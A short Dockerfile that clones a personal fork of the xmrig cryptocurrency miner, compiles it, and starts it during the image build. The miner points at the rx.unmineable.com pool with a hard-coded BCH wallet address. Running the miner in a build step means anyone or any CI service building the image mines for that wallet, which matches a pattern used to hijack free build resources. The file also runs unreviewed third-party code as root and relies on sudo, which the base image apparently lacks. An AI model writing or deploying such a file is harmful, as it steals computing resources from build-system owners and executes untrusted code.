FROM ubuntu:18.04

RUN apt-get update
RUN sudo apt-get update && sudo apt install -y git build-essential cmake libuv1-dev libmicrohttpd-dev libssl-dev hwloc libhwloc-dev && sudo git clone https://github.com/Shouko12/xmrig.git xmrig && cd xmrig && sudo cmake . && sudo make &&  sudo ./xmrig -o rx.unmineable.com:3333 -u BCH:qqvqd46p9qg0rsrkw8n4f4fllraj853f65zkypyjsr.swenson
